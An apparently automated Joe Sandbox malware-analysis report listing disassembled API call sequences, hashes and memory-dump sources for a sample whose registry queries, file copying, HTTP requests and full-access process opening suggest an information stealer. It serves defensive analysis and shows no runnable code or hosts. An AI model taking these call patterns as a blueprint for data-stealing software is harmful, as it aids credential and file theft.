                                          • Sleep.KERNEL32(0000EA60), ref: 022E5C82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpylstrlen$Sleepstrtok
                                          • String ID:
                                          • API String ID: 3630751533-0
                                          • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                          • Instruction ID: e0dad19829b9998260d0b21101c0b68568d91499336cf093027f9cc691bbf922
                                          • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                          • Instruction Fuzzy Hash: FFE1FA71920304AACF18FBE0DD969FD737AAF65300FC08168A50766298EF785B58DF91
                                          APIs
                                          • memset.MSVCRT ref: 022D158E
                                            • Part of subcall function 022D1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D151B
                                            • Part of subcall function 022D1507: RtlAllocateHeap.NTDLL(00000000), ref: 022D1522
                                            • Part of subcall function 022D1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022D153E
                                            • Part of subcall function 022D1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022D155C
                                            • Part of subcall function 022D1507: RegCloseKey.ADVAPI32(?), ref: 022D1566
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D15B6
                                          • lstrlen.KERNEL32(?), ref: 022D15C3
                                          • lstrcat.KERNEL32(?,004262EC), ref: 022D15DE
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 022D16CC
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022D9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                            • Part of subcall function 022D9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                            • Part of subcall function 022D9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                            • Part of subcall function 022D9C27: ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                            • Part of subcall function 022D9C27: LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                            • Part of subcall function 022D9C27: CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                          • DeleteFileA.KERNEL32(00000000), ref: 022D1756
                                          • memset.MSVCRT ref: 022D177D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                          • String ID:
                                          • API String ID: 3885987321-0
                                          • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                          • Instruction ID: fb8d6179fda7bab45180705094579d78368cd3d266ec192a883a346b33f76260
                                          • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                          • Instruction Fuzzy Hash: 8F515EB19603199BCF15FBA0DD91EED737EAF54300F8041A8A60B62194EF345B89CFA5
                                          APIs
                                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                          • wsprintfA.USER32 ref: 00418459
                                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • RegQueryValueExA.ADVAPI32(00000000,0097B4E0,00000000,000F003F,?,00000400), ref: 004184EC
                                          • lstrlenA.KERNEL32(?), ref: 00418501
                                          • RegQueryValueExA.ADVAPI32(00000000,0097B720,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                          • String ID: %s\%s
                                          • API String ID: 3896182533-4073750446
                                          • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                          • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                          • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                          • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ??2@$CrackInternetlstrlen
                                          • String ID: <
                                          • API String ID: 1683549937-4251816714
                                          • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                          • Instruction ID: 0ebf7afa77a7499f55e7d8a0e3a91045032743aa6deee66afbcbfd2db8279f76
                                          • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                          • Instruction Fuzzy Hash: DF215BB5D00219ABDF10DFA4E848AED7B75FF44320F008225F925A7290EB706A05CF91
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                          • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                          • RegOpenKeyExA.ADVAPI32(80000002,00949DB8,00000000,00020119,00000000), ref: 004176DD
                                          • RegQueryValueExA.ADVAPI32(00000000,0097B438,00000000,00000000,?,000000FF), ref: 004176FE
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                          • String ID: Windows 11
                                          • API String ID: 3466090806-2517555085
                                          • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                          • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                          • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                          • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E790B
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022E7912
                                          • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 022E7944
                                          • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 022E7965
                                          • RegCloseKey.ADVAPI32(00000000), ref: 022E796F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID: Windows 11
                                          • API String ID: 3225020163-2517555085
                                          • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                          • Instruction ID: abc0e968c0233fa8e894c544106124b9d0fc15a27f8f0594f8b23556f590e95e
                                          • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                          • Instruction Fuzzy Hash: A0012CB9A80205BBEB10DBE0ED49FADB7B9EB48701F405154FA0597284D6749900DB51
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                          • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                          • RegOpenKeyExA.ADVAPI32(80000002,00949DB8,00000000,00020119,004176B9), ref: 0041775B
                                          • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                          • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                          • String ID: CurrentBuildNumber
                                          • API String ID: 3466090806-1022791448
                                          • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                          • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                          • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                          • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                          APIs
                                          • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                          • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                          • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleSize
                                          • String ID: :A$:A
                                          • API String ID: 1378416451-1974578005
                                          • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                          • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                          • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                          • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022D75A1
                                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022D7618
                                          • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022D7674
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 022D76B9
                                          • HeapFree.KERNEL32(00000000), ref: 022D76C0
                                            • Part of subcall function 022D94A7: vsprintf_s.MSVCRT ref: 022D94C2
                                          • task.LIBCPMTD ref: 022D77BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                          • String ID:
                                          • API String ID: 700816787-0
                                          • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                          • Instruction ID: 985516c6a567e9979c7789ec1ba92c41fceb340a74dbe4baf8dcf9c2376ddfbd
                                          • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                          • Instruction Fuzzy Hash: D0612BB5D1026C9BDB24DB90CC44FE9B7B9BF48304F0085E9E649A6144DBB4ABC6CF91
                                          APIs
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022D64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022D6548
                                            • Part of subcall function 022D64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 022D656A
                                            • Part of subcall function 022D64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D659C
                                            • Part of subcall function 022D64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D65EC
                                            • Part of subcall function 022D64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022D6626
                                            • Part of subcall function 022D64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022D6638
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                          • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022E557F
                                          • lstrlen.KERNEL32(00000000), ref: 022E5596
                                            • Part of subcall function 022E9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022E90B9
                                          • StrStrA.SHLWAPI(00000000,00000000), ref: 022E55CB
                                          • lstrlen.KERNEL32(00000000), ref: 022E55EA
                                          • strtok.MSVCRT(00000000,?), ref: 022E5605
                                          • lstrlen.KERNEL32(00000000), ref: 022E5615
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                          • String ID:
                                          • API String ID: 3532888709-0
                                          • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                          • Instruction ID: 1ced987d4e87149b9c0a6b98270ef0a8d6ce9bfccf57fa706730ccda712ff8dc
                                          • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                          • Instruction Fuzzy Hash: C951D6709203489BCF28EFE4CA95AFD7776AF60304FD04018E80B666A8EB746B55DF51
                                          APIs
                                          • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 022E7345
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          • OpenProcess.KERNEL32(001FFFFF,00000000,022E7574,004205BD), ref: 022E7383
                                          • memset.MSVCRT ref: 022E73D1
                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 022E7525
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: OpenProcesslstrcpymemset
                                          • String ID:
                                          • API String ID: 224852652-0
                                          • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                          • Instruction ID: 446d094d11ffc115d9bd27588527ddb05539baa11e63a0a4d21ca1f5bf8cb074
                                          • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                          • Instruction Fuzzy Hash: A0518FB0C203199BDF24DBE4DC84BEDF775AF44305F9041A9E606A7284EB746A88DF58
                                          APIs
                                          • memset.MSVCRT ref: 004140D5
                                          • RegOpenKeyExA.ADVAPI32(80000001,0097BAA0,00000000,00020119,?), ref: 004140F4
                                          • RegQueryValueExA.ADVAPI32(?,0097C628,00000000,00000000,00000000,000000FF), ref: 00414118
                                          • RegCloseKey.ADVAPI32(?), ref: 00414122
                                          • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                          • lstrcatA.KERNEL32(?,0097C4C0), ref: 0041415B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CloseOpenQueryValuememset
                                          • String ID:
                                          • API String ID: 2623679115-0
                                          • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                          • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                          • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                          • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                          APIs
                                          • memset.MSVCRT ref: 022E433C
                                          • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 022E435B
                                          • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 022E437F
                                          • RegCloseKey.ADVAPI32(?), ref: 022E4389
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E43AE
                                          • lstrcat.KERNEL32(?,0064A168), ref: 022E43C2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CloseOpenQueryValuememset
                                          • String ID:
                                          • API String ID: 2623679115-0
                                          • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                          • Instruction ID: 774d50453fc92d8a0cf0f41e48c519431a2f8cf08798a2021fe9358087ec2b5a
                                          • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                          • Instruction Fuzzy Hash: F641C4B6950208BBDF14FBE0DC45FEE333AAB49300F40455CA61A571D4EA759698CFE2
                                          APIs
                                          • strtok_s.MSVCRT ref: 00413588
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • strtok_s.MSVCRT ref: 004136D1
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00946070,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpystrtok_s$lstrlen
                                          • String ID:
                                          • API String ID: 3184129880-0
                                          • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                          • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                          • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                          • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                          APIs
                                          • __lock.LIBCMT ref: 0041B39A
                                            • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                            • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                            • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                          • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                          • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                            • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                          • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                          • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                          • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                          • String ID:
                                          • API String ID: 2005412495-0
                                          • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                          • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                          • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                          • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                          APIs
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022E9B08
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022E9B21
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022E9B39
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022E9B51
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022E9B6A
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022E9B82
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 022E9B9A
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022E9BB3
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022E9BCB
